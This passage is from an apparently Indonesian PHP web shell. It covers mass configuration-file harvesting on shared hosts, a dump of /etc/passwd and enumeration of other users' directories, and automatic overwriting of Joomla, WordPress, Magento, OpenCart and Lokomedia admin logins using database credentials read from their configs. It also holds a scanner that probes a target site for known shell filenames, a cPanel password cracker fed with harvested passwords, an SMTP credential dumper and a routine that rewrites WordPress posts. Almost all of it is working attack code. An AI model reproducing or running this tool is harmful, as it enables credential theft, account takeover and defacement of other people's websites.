  2811. "/home3/$user_cox/public_html/joomla/configuration.php" => "JoomlaJoomla",
  2812. "/home3/$user_cox/public_html/JOOMLA/configuration.php" => "JoomlaJoomla",
  2813. "/home3/$user_cox/public_html/Home/configuration.php" => "JoomlaHome",
  2814. "/home3/$user_cox/public_html/HOME/configuration.php" => "JoomlaHome",
  2815. "/home3/$user_cox/public_html/home/configuration.php" => "JoomlaHome",
  2816. "/home3/$user_cox/public_html/NEW/configuration.php" => "JoomlaNew",
  2817. "/home3/$user_cox/public_html/New/configuration.php" => "JoomlaNew",
  2818. "/home3/$user_cox/public_html/new/configuration.php" => "JoomlaNew",
  2819. "/home3/$user_cox/public_html/News/configuration.php" => "JoomlaNews",
  2820. "/home3/$user_cox/public_html/NEWS/configuration.php" => "JoomlaNews",
  2821. "/home3/$user_cox/public_html/news/configuration.php" => "JoomlaNews",
  2822. "/home3/$user_cox/public_html/Cms/configuration.php" => "JoomlaCms",
  2823. "/home3/$user_cox/public_html/CMS/configuration.php" => "JoomlaCms",
  2824. "/home3/$user_cox/public_html/cms/configuration.php" => "JoomlaCms",
  2825. "/home3/$user_cox/public_html/Main/configuration.php" => "JoomlaMain",
  2826. "/home3/$user_cox/public_html/MAIN/configuration.php" => "JoomlaMain",
  2827. "/home3/$user_cox/public_html/main/configuration.php" => "JoomlaMain",
  2828. "/home3/$user_cox/public_html/Blog/configuration.php" => "JoomlaBlog",
  2829. "/home3/$user_cox/public_html/BLOG/configuration.php" => "JoomlaBlog",
  2830. "/home3/$user_cox/public_html/blog/configuration.php" => "JoomlaBlog",
  2831. "/home3/$user_cox/public_html/Blogs/configuration.php" => "JoomlaBlogs",
  2832. "/home3/$user_cox/public_html/BLOGS/configuration.php" => "JoomlaBlogs",
  2833. "/home3/$user_cox/public_html/blogs/configuration.php" => "JoomlaBlogs",
  2834. "/home3/$user_cox/public_html/beta/configuration.php" => "JoomlaBeta",
  2835. "/home3/$user_cox/public_html/Beta/configuration.php" => "JoomlaBeta",
  2836. "/home3/$user_cox/public_html/BETA/configuration.php" => "JoomlaBeta",
  2837. "/home3/$user_cox/public_html/PRESS/configuration.php" => "JoomlaPress",
  2838. "/home3/$user_cox/public_html/Press/configuration.php" => "JoomlaPress",
  2839. "/home3/$user_cox/public_html/press/configuration.php" => "JoomlaPress",
  2840. "/home3/$user_cox/public_html/Wp/configuration.php" => "JoomlaWp",
  2841. "/home3/$user_cox/public_html/wp/configuration.php" => "JoomlaWp",
  2842. "/home3/$user_cox/public_html/WP/configuration.php" => "JoomlaWP",
  2843. "/home3/$user_cox/public_html/portal/configuration.php" => "JoomlaPortal",
  2844. "/home3/$user_cox/public_html/PORTAL/configuration.php" => "JoomlaPortal",
  2845. "/home3/$user_cox/public_html/Portal/configuration.php" => "JoomlaPortal",
  2846. "/home3/$user_cox/public_html/wp-config.php" => "WordPress",
  2847. "/home3/$user_cox/public_html/wordpress/wp-config.php" => "WordPressWordpress",
  2848. "/home3/$user_cox/public_html/Wordpress/wp-config.php" => "WordPressWordpress",
  2849. "/home3/$user_cox/public_html/WORDPRESS/wp-config.php" => "WordPressWordpress",
  2850. "/home3/$user_cox/public_html/Home/wp-config.php" => "WordPressHome",
  2851. "/home3/$user_cox/public_html/HOME/wp-config.php" => "WordPressHome",
  2852. "/home3/$user_cox/public_html/home/wp-config.php" => "WordPressHome",
  2853. "/home3/$user_cox/public_html/NEW/wp-config.php" => "WordPressNew",
  2854. "/home3/$user_cox/public_html/New/wp-config.php" => "WordPressNew",
  2855. "/home3/$user_cox/public_html/new/wp-config.php" => "WordPressNew",
  2856. "/home3/$user_cox/public_html/News/wp-config.php" => "WordPressNews",
  2857. "/home3/$user_cox/public_html/NEWS/wp-config.php" => "WordPressNews",
  2858. "/home3/$user_cox/public_html/news/wp-config.php" => "WordPressNews",
  2859. "/home3/$user_cox/public_html/Cms/wp-config.php" => "WordPressCms",
  2860. "/home3/$user_cox/public_html/CMS/wp-config.php" => "WordPressCms",
  2861. "/home3/$user_cox/public_html/cms/wp-config.php" => "WordPressCms",
  2862. "/home3/$user_cox/public_html/Main/wp-config.php" => "WordPressMain",
  2863. "/home3/$user_cox/public_html/MAIN/wp-config.php" => "WordPressMain",
  2864. "/home3/$user_cox/public_html/main/wp-config.php" => "WordPressMain",
  2865. "/home3/$user_cox/public_html/Blog/wp-config.php" => "WordPressBlog",
  2866. "/home3/$user_cox/public_html/BLOG/wp-config.php" => "WordPressBlog",
  2867. "/home3/$user_cox/public_html/blog/wp-config.php" => "WordPressBlog",
  2868. "/home3/$user_cox/public_html/Blogs/wp-config.php" => "WordPressBlogs",
  2869. "/home3/$user_cox/public_html/BLOGS/wp-config.php" => "WordPressBlogs",
  2870. "/home3/$user_cox/public_html/blogs/wp-config.php" => "WordPressBlogs",
  2871. "/home3/$user_cox/public_html/beta/wp-config.php" => "WordPressBeta",
  2872. "/home3/$user_cox/public_html/Beta/wp-config.php" => "WordPressBeta",
  2873. "/home3/$user_cox/public_html/BETA/wp-config.php" => "WordPressBeta",
  2874. "/home3/$user_cox/public_html/PRESS/wp-config.php" => "WordPressPress",
  2875. "/home3/$user_cox/public_html/Press/wp-config.php" => "WordPressPress",
  2876. "/home3/$user_cox/public_html/press/wp-config.php" => "WordPressPress",
  2877. "/home3/$user_cox/public_html/Wp/wp-config.php" => "WordPressWp",
  2878. "/home3/$user_cox/public_html/wp/wp-config.php" => "WordPressWp",
  2879. "/home3/$user_cox/public_html/WP/wp-config.php" => "WordPressWP",
  2880. "/home3/$user_cox/public_html/portal/wp-config.php" => "WordPressPortal",
  2881. "/home3/$user_cox/public_html/PORTAL/wp-config.php" => "WordPressPortal",
  2882. "/home3/$user_cox/public_html/Portal/wp-config.php" => "WordPressPortal"
  2883. );
  2884. foreach($grab_config as $config => $nama_config) {
  2885. $ambil_config = file_get_contents($config);
  2886. if($ambil_config == '') {
  2887. } else {
  2888. $file_config = fopen("cox_config/$user_cox-$nama_config.txt","w");
  2889. fputs($file_config,$ambil_config);
  2890. }
  2891. }
  2892. }
  2893. }
  2894. echo "<center><a href='?dir=$dir/cox_config'><font color=lime>Done</font></a></center>";
  2895. }else{
  2896.  
  2897. echo "<form method=\"post\" action=\"\"><center>etc/passw ( Error ? <a href='?dir=$dir&do=passwbypass'>Bypass Here</a> )<br><textarea name=\"passwd\" class='area' rows='15' cols='60'>\n";
  2898. echo file_get_contents('/etc/passwd');
  2899. echo "</textarea><br><input type=\"submit\" value=\"GassPoll\"></td></tr></center>\n";
  2900. }
  2901. } elseif($_GET['do'] == 'jumping') {
  2902. $i = 0;
  2903. echo "<pre><div class='margin: 5px auto;'>";
  2904. $etc = fopen("/etc/passwd", "r");
  2905. while($passwd = fgets($etc)) {
  2906. if($passwd == '' || !$etc) {
  2907. echo "<font color=red>Can't read /etc/passwd</font>";
  2908. } else {
  2909. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  2910. foreach($user_jumping[1] as $user_idx_jump) {
  2911. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  2912. if(is_readable($user_jumping_dir)) {
  2913. $i++;
  2914. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2915. if(is_writable($user_jumping_dir)) {
  2916. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a><br>";
  2917. }
  2918. echo $jrw;
  2919. $domain_jump = file_get_contents("/etc/named.conf");
  2920. if($domain_jump == '') {
  2921. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  2922. } else {
  2923. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  2924. foreach($domains_jump[1] as $dj) {
  2925. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  2926. $user_jumping_url = $user_jumping_url['name'];
  2927. if($user_jumping_url == $user_idx_jump) {
  2928. echo " => ( <u>$dj</u> )<br>";
  2929. break;
  2930. }
  2931. }
  2932. }
  2933. }
  2934. }
  2935. }
  2936. }
  2937. if($i == 0) {
  2938. } else {
  2939. echo "<br>Total ada ".$i." Kimcil di ".gethostbyname($_SERVER['HTTP_HOST'])."";
  2940. }
  2941. echo "</div></pre>";
  2942. } elseif($_GET['do'] == 'auto_edit_user') {
  2943. if($_POST['hajar']) {
  2944. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  2945. echo "username atau password harus lebih dari 6 karakter";
  2946. } else {
  2947. $user_baru = $_POST['user_baru'];
  2948. $pass_baru = md5($_POST['pass_baru']);
  2949. $conf = $_POST['config_dir'];
  2950. $scan_conf = scandir($conf);
  2951. foreach($scan_conf as $file_conf) {
  2952. if(!is_file("$conf/$file_conf")) continue;
  2953. $config = file_get_contents("$conf/$file_conf");
  2954. if(preg_match("/JConfig|joomla/",$config)) {
  2955. $dbhost = ambilkata($config,"host = '","'");
  2956. $dbuser = ambilkata($config,"user = '","'");
  2957. $dbpass = ambilkata($config,"password = '","'");
  2958. $dbname = ambilkata($config,"db = '","'");
  2959. $dbprefix = ambilkata($config,"dbprefix = '","'");
  2960. $prefix = $dbprefix."users";
  2961. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2962. $db = mysql_select_db($dbname);
  2963. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2964. $result = mysql_fetch_array($q);
  2965. $id = $result['id'];
  2966. $site = ambilkata($config,"sitename = '","'");
  2967. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  2968. echo "Config => ".$file_conf."<br>";
  2969. echo "CMS => Joomla<br>";
  2970. if($site == '') {
  2971. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  2972. } else {
  2973. echo "Sitename => $site<br>";
  2974. }
  2975. if(!$update OR !$conn OR !$db) {
  2976. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  2977. } else {
  2978. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  2979. }
  2980. mysql_close($conn);
  2981. } elseif(preg_match("/WordPress/",$config)) {
  2982. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2983. $dbuser = ambilkata($config,"DB_USER', '","'");
  2984. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2985. $dbname = ambilkata($config,"DB_NAME', '","'");
  2986. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2987. $prefix = $dbprefix."users";
  2988. $option = $dbprefix."options";
  2989. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2990. $db = mysql_select_db($dbname);
  2991. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2992. $result = mysql_fetch_array($q);
  2993. $id = $result[ID];
  2994. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2995. $result2 = mysql_fetch_array($q2);
  2996. $target = $result2[option_value];
  2997. if($target == '') {
  2998. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  2999. } else {
  3000. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  3001. }
  3002. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  3003. echo "Config => ".$file_conf."<br>";
  3004. echo "CMS => Wordpress<br>";
  3005. echo $url_target;
  3006. if(!$update OR !$conn OR !$db) {
  3007. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3008. } else {
  3009. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3010. }
  3011. mysql_close($conn);
  3012. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  3013. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  3014. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  3015. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  3016. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  3017. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  3018. $prefix = $dbprefix."admin_user";
  3019. $option = $dbprefix."core_config_data";
  3020. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3021. $db = mysql_select_db($dbname);
  3022. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3023. $result = mysql_fetch_array($q);
  3024. $id = $result[user_id];
  3025. $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  3026. $result2 = mysql_fetch_array($q2);
  3027. $target = $result2[value];
  3028. if($target == '') {
  3029. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3030. } else {
  3031. $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  3032. }
  3033. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3034. echo "Config => ".$file_conf."<br>";
  3035. echo "CMS => Magento<br>";
  3036. echo $url_target;
  3037. if(!$update OR !$conn OR !$db) {
  3038. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3039. } else {
  3040. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3041. }
  3042. mysql_close($conn);
  3043. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  3044. $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  3045. $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  3046. $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  3047. $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  3048. $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  3049. $prefix = $dbprefix."user";
  3050. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3051. $db = mysql_select_db($dbname);
  3052. $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  3053. $result = mysql_fetch_array($q);
  3054. $id = $result[user_id];
  3055. $target = ambilkata($config,"HTTP_SERVER', '","'");
  3056. if($target == '') {
  3057. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3058. } else {
  3059. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  3060. }
  3061. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  3062. echo "Config => ".$file_conf."<br>";
  3063. echo "CMS => OpenCart<br>";
  3064. echo $url_target;
  3065. if(!$update OR !$conn OR !$db) {
  3066. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3067. } else {
  3068. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3069. }
  3070. mysql_close($conn);
  3071. } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  3072. $dbhost = ambilkata($config,'server = "','"');
  3073. $dbuser = ambilkata($config,'username = "','"');
  3074. $dbpass = ambilkata($config,'password = "','"');
  3075. $dbname = ambilkata($config,'database = "','"');
  3076. $prefix = "users";
  3077. $option = "identitas";
  3078. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3079. $db = mysql_select_db($dbname);
  3080. $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  3081. $result = mysql_fetch_array($q);
  3082. $target = $result[alamat_website];
  3083. if($target == '') {
  3084. $target2 = $result[url];
  3085. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3086. if($target2 == '') {
  3087. $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  3088. } else {
  3089. $cek_login3 = file_get_contents("$target2/adminweb/");
  3090. $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  3091. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  3092. $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  3093. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  3094. $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  3095. } else {
  3096. $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3097. }
  3098. }
  3099. } else {
  3100. $cek_login = file_get_contents("$target/adminweb/");
  3101. $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  3102. if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  3103. $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  3104. } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  3105. $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  3106. } else {
  3107. $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  3108. }
  3109. }
  3110. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  3111. echo "Config => ".$file_conf."<br>";
  3112. echo "CMS => Lokomedia<br>";
  3113. if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  3114. echo $url_target2;
  3115. } else {
  3116. echo $url_target;
  3117. }
  3118. if(!$update OR !$conn OR !$db) {
  3119. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  3120. } else {
  3121. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  3122. }
  3123. mysql_close($conn);
  3124. }
  3125. }
  3126. }
  3127. } else {
  3128. echo "<center>
  3129. <h1>Auto Edit User Config</h1>
  3130. <form method='post'>
  3131. DIR Config: <br>
  3132. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3133. Set User & Pass: <br>
  3134. <input type='text' name='user_baru' value='hscrew' placeholder='user_baru'><br>
  3135. <input type='text' name='pass_baru' value='hscrew' placeholder='pass_baru'><br>
  3136. <input type='submit' name='hajar' value='Hajar!' style='width: 215px;'>
  3137. </form>
  3138. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3139. ";
  3140. }
  3141. }elseif($_GET['do'] == 'shelscan') {
  3142. echo'<center><h2>Shell Finder</h2>
  3143. <form action="" method="post">
  3144. <input type="text" size="50" name="traget" value="http://www.site.com/"/>
  3145. <br>
  3146. <input name="scan" value="Start Scaning" style="width: 215px;" type="submit">
  3147. </form><br>';
  3148. if (isset($_POST["scan"])) {
  3149. $url = $_POST['traget'];
  3150. echo "<br /><span class='start'>Scanning ".$url."<br /><br /></span>";
  3151. echo "Result :<br />";
  3152. $shells = array("WSO.php","dz.php","cpanel.php","cpn.php","sql.php","mysql.php","madspot.php","cp.php","cpbt.php","sYm.php",
  3153. "x.php","r99.php","lol.php","jo.php","wp.php","whmcs.php","shellz.php","d0main.php","d0mains.php","users.php",
  3154. "Cgishell.pl","killer.php","changeall.php","2.php","Sh3ll.php","dz0.php","dam.php","user.php","dom.php","whmcs.php",
  3155. "vb.zip","r00t.php","c99.php","gaza.php","1.php","wp.zip"."wp-content/plugins/disqus-comment-system/disqus.php",
  3156. "d0mains.php","wp-content/plugins/akismet/akismet.php","madspotshell.php","Sym.php","c22.php","c100.php",
  3157. "wp-content/plugins/akismet/admin.php#","wp-content/plugins/google-sitemap-generator/sitemap-core.php#",
  3158. "wp-content/plugins/akismet/widget.php#","Cpanel.php","zone-h.php","tmp/user.php","tmp/Sym.php","cp.php",
  3159. "tmp/madspotshell.php","tmp/root.php","tmp/whmcs.php","tmp/index.php","tmp/2.php","tmp/dz.php","tmp/cpn.php",
  3160. "tmp/changeall.php","tmp/Cgishell.pl","tmp/sql.php","tmp/admin.php","cliente/downloads/h4xor.php",
  3161. "whmcs/downloads/dz.php","L3b.php","d.php","tmp/d.php","tmp/L3b.php","wp-content/plugins/akismet/admin.php",
  3162. "templates/rhuk_milkyway/index.php","templates/beez/index.php","admin1.php","upload.php","up.php","vb.zip","vb.rar",
  3163. "admin2.asp","uploads.php","sa.php","sysadmins/","admin1/","administration/Sym.php","images/Sym.php",
  3164. "/r57.php","/wp-content/plugins/disqus-comment-system/disqus.php","/shell.php","/sa.php","/admin.php",
  3165. "/sa2.php","/2.php","/gaza.php","/up.php","/upload.php","/uploads.php","/templates/beez/index.php","shell.php","/amad.php",
  3166. "/t00.php","/dz.php","/site.rar","/Black.php","/site.tar.gz","/home.zip","/home.rar","/home.tar","/home.tar.gz",
  3167. "/forum.zip","/forum.rar","/forum.tar","/forum.tar.gz","/test.txt","/ftp.txt","/user.txt","/site.txt","/error_log","/error",
  3168. "/cpanel","/awstats","/site.sql","/vb.sql","/forum.sql","/backup.sql","/back.sql","/data.sql","wp.rar/",
  3169. "wp-content/plugins/disqus-comment-system/disqus.php","asp.aspx","/templates/beez/index.php","tmp/vaga.php",
  3170. "tmp/killer.php","whmcs.php","tmp/killer.php","tmp/domaine.pl","tmp/domaine.php","useradmin/",
  3171. "tmp/d0maine.php","d0maine.php","tmp/sql.php","tmp/dz1.php","dz1.php","forum.zip","Symlink.php","Symlink.pl",
  3172. "forum.rar","joomla.zip","joomla.rar","wp.php","buck.sql","sysadmin.php","images/c99.php", "xd.php", "c100.php",
  3173. "spy.aspx","xd.php","tmp/xd.php","sym/root/home/","billing/killer.php","tmp/upload.php","tmp/admin.php",
  3174. "Server.php","tmp/uploads.php","tmp/up.php","Server/","wp-admin/c99.php","tmp/priv8.php","priv8.php","cgi.pl/",
  3175. "tmp/cgi.pl","downloads/dom.php","templates/ja-helio-farsi/index.php","webadmin.html","admins.php",
  3176. "/wp-content/plugins/count-per-day/js/yc/d00.php", "admins/","admins.asp","admins.php","wp.zip","wso2.5.1","pasir.php","pasir2.php","up.php","cok.php","newfile.php","upl.php",".php","a.php","crot.php","kontol.php","hmei7.php","jembut.php","memek.php","tai.php","rabit.php","indoxploit.php","a.php","hemb.php","hack.php","galau.php","HsH.php","indoXploit.php","asu.php","wso.php","lol.php","idx.php","rabbit.php","1n73ction.php","k.php","mailer.php","mail.php","temp.php","c.php","d.php","IDB.php","indo.php","indonesia.php","semvak.php","ndasmu.php","cox.php","as.php","ad.php","aa.php","file.php","peju.php","asd.php","configs.php","ass.php","z.php");
  3177. foreach ($shells as $shell){
  3178. $headers = get_headers("$url$shell"); //
  3179. if (eregi('200', $headers[0])) {
  3180. echo "<a href='$url$shell'>$url$shell</a> <span class='found'>Done</span><br /><br/><br/>"; //
  3181. $dz = fopen('shells.txt', 'a+');
  3182. $suck = "$url$shell";
  3183. fwrite($dz, $suck."\n");
  3184. }
  3185. }
  3186. echo "Shell [ <a href='./shells.txt' target='_blank'>shells.txt</a> ]</span>";
  3187. }
  3188.  
  3189. }
  3190. elseif($_GET['do'] == 'cpanel') {
  3191. if($_POST['crack']) {
  3192. $usercp = explode("\r\n", $_POST['user_cp']);
  3193. $passcp = explode("\r\n", $_POST['pass_cp']);
  3194. $i = 0;
  3195. foreach($usercp as $ucp) {
  3196. foreach($passcp as $pcp) {
  3197. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3198. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3199. } else {
  3200. $_SESSION[$ucp] = "1";
  3201. $_SESSION[$pcp] = "1";
  3202. $i++;
  3203. echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3204. }
  3205. }
  3206. }
  3207. }
  3208. if($i == 0) {
  3209. } else {
  3210. echo "<br>Nemu ".$i." Cpanel by <font color=lime>hscrew</font>";
  3211. }
  3212. } else {
  3213. echo "<center>
  3214. <form method='post'>
  3215. USER: <br>
  3216. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3217. $_usercp = fopen("/etc/passwd","r");
  3218. while($getu = fgets($_usercp)) {
  3219. if($getu == '' || !$_usercp) {
  3220. echo "<font color=red>Can't read /etc/passwd</font>";
  3221. } else {
  3222. preg_match_all("/(.*?):x:/", $getu, $u);
  3223. foreach($u[1] as $user_cp) {
  3224. if(is_dir("/home/$user_cp/public_html")) {
  3225. echo "$user_cp\n";
  3226. }
  3227. }
  3228. }
  3229. }
  3230. echo "</textarea><br>
  3231. PASS: <br>
  3232. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3233. function cp_pass($dir) {
  3234. $pass = "";
  3235. $dira = scandir($dir);
  3236. foreach($dira as $dirb) {
  3237. if(!is_file("$dir/$dirb")) continue;
  3238. $ambil = file_get_contents("$dir/$dirb");
  3239. if(preg_match("/WordPress/", $ambil)) {
  3240. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3241. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3242. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3243. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3244. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3245. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3246. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3247. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3248. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3249. } elseif(preg_match("/client/", $ambil)) {
  3250. preg_match("/password=(.*)/", $ambil, $pass1);
  3251. if(preg_match('/"/', $pass1[1])) {
  3252. $pass1[1] = str_replace('"', "", $pass1[1]);
  3253. $pass .= $pass1[1]."\n";
  3254. }
  3255. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3256. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3257. }
  3258. }
  3259. echo $pass;
  3260. }
  3261. $cp_pass = cp_pass($dir);
  3262. echo $cp_pass;
  3263. echo "</textarea><br>
  3264. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3265. </form>
  3266. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3267. }
  3268. } elseif($_GET['do'] == 'smtp') {
  3269. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3270. function scj($dir) {
  3271. $dira = scandir($dir);
  3272. foreach($dira as $dirb) {
  3273. if(!is_file("$dir/$dirb")) continue;
  3274. $ambil = file_get_contents("$dir/$dirb");
  3275. $ambil = str_replace("$", "", $ambil);
  3276. if(preg_match("/JConfig|joomla/", $ambil)) {
  3277. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3278. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3279. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3280. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3281. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3282. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3283. echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3284. echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3285. echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3286. echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3287. echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3288. echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3289. }
  3290. }
  3291. }
  3292. $smpt_hunter = scj($dir);
  3293. echo $smpt_hunter;
  3294. } elseif($_GET['do'] == 'auto_wp') {
  3295. if($_POST['hajar']) {
  3296. $title = htmlspecialchars($_POST['new_title']);
  3297. $pn_title = str_replace(" ", "-", $title);
  3298. if($_POST['cek_edit'] == "Y") {
  3299. $script = $_POST['edit_content'];
  3300. } else {
  3301. $script = $title;
  3302. }
  3303. $conf = $_POST['config_dir'];
  3304. $scan_conf = scandir($conf);
  3305. foreach($scan_conf as $file_conf) {
  3306. if(!is_file("$conf/$file_conf")) continue;
  3307. $config = file_get_contents("$conf/$file_conf");
  3308. if(preg_match("/WordPress/", $config)) {
  3309. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3310. $dbuser = ambilkata($config,"DB_USER', '","'");
  3311. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3312. $dbname = ambilkata($config,"DB_NAME', '","'");
  3313. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3314. $prefix = $dbprefix."posts";
  3315. $option = $dbprefix."options";
  3316. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3317. $db = mysql_select_db($dbname);
  3318. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3319. $result = mysql_fetch_array($q);
  3320. $id = $result[ID];
  3321. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3322. $result2 = mysql_fetch_array($q2);
  3323. $target = $result2[option_value];
  3324. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3325. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3326. echo "<div style='margin: 5px auto;'>";
  3327. if($target == '') {
  3328. echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3329. } else {
  3330. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3331. }
  3332. if(!$update OR !$conn OR !$db) {
